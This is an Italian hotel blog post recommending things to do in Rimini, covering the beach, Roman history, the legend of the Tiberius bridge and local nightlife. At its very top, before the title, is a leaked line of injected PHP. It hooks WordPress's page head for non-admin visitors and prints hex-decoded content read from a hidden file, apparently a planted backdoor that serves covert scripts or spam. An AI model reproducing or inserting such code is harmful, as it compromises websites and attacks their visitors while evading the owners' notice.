if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Cose da fare a Rimini 🤩🌊☀️ - Hotel Monica
 
13Mag

Cose da fare a Rimini 🤩🌊☀️

Quando si pensa ad una città come Rimini, si pensa soprattutto alla spiaggia, alla vacanza in pensione completa albergo-spiaggia / spiaggia-albergo, al profumo di crema solare, mescolato alla fragranza di lasagne e fritto misto che esce dalle cucine di pensioni e ristoranti..

E questo è un aspetto reale e meraviglioso per tutti coloro che vogliono rilassarsi, staccare dalla routine, lasciare da parte i mille impegni che ci tediano per 358 giorni all’anno. Se cerchi questo tipo di vacanza, a Rimini la trovi eccome e, sicuramente tornerai a casa abbronzato, riposato e probabilmente, anche un po’ ingrassato.

Se invece cerchi una vacanza rilassante, ma non troppo, sappi che a Rimini ci sono tante cose da vedere e da fare. Per esempio, lo sapevi che Rimini è una città romana con uno straordinario patrimonio storico ? Rimini è stata occupata dai Romani per la sua posizione geografica strategica, per la fertilità delle sue terre e la bellezza delle coste. Ecco perchè i Romani hanno fondato Ariminum, la più antica colonia dell’Impero Romano e le hanno dato la prima impronta urbana, grazie alla realizzazione della rete stradale, con la tipica forma a croce.

Nel centro storico di Rimini uno dei luoghi più magici è il ponte di Tiberio, detto anche ponte del Diavolo. La leggenda narra che Tiberio nell’intento di terminare l’opera iniziata da suo padre Augusto, chiese al Signore delle Tenebre di costruire un ponte che durasse per l’eternità, in cambio dell’anima del primo che avrebbe attraversato il ponte. Il ponte fu costruito in una notte e al momento dell’inaugurazione Tiberio ordinò che, in segno propiziatorio, prima di tutti sul nuovo ponte, dovesse passare un cane. Così fu fatto e il Diavolo , rimase a bocca asciutta. Preso dall’ira tentò di distruggere il ponte prendendolo a calci, ma era talmente solido che dovette arrendersi. Su una delle pietre poste all’inizio del ponte, ci sono impresse alcune impronte caprine, che testimoniano la collera del diavolo.

Oltre al centro storico, c’è un favoloso entroterra da scoprire…i borghi medievali, le cantine vinicole, il tetto del mondo nella vicina Gabicce, dove vivere l’aperitivo più indimenticabile della tua vita e tutti i luoghi del divertimento notturno; le storiche discoteche riccionesi, i chiringuitos sulla spiaggia, nati con la pandemia per potersi divertire all’aperto e il palco più spettacolare dell’estate al Beach Arena, una grandissima area sulla spiaggia, dove vivere a piedi nudi sulla sabbia meravigliosi concerti dei più grandi artisti italiani ed internazionali.

Richiedi informazioni

Compila il form sottostante per richiedere informazioni. Ti risponderemo prontamente!